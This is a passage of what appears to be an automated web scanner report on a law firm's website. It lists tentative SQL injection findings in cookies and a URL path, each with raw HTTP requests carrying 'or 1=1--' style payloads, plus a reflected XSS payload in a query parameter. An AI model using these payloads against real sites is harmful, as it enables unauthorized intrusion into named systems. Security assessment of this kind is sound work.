GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d2--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.14. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16707661'%20or%201%3d1--%20 and 16707661'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:06:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.15. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 12161945'%20or%201%3d1--%20 and 12161945'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:06:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...
1.16. http://www.curtis.com/favicon.ico [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 61658724%20or%201%3d1--%20 and 61658724%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:00:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175919;path=/
Set-Cookie: CFTOKEN=56500703;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.17. http://www.curtis.com/favicon.ico [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 57319298%20or%201%3d1--%20 and 57319298%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:01 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175943;path=/
Set-Cookie: CFTOKEN=60929706;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...
1.18. http://www.curtis.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 67004861'%20or%201%3d1--%20 and 67004861'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico67004861'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /favicon.ico67004861'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
1.19. http://www.curtis.com/favicon.ico [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 11177873'%20or%201%3d1--%20 and 11177873'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:01:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
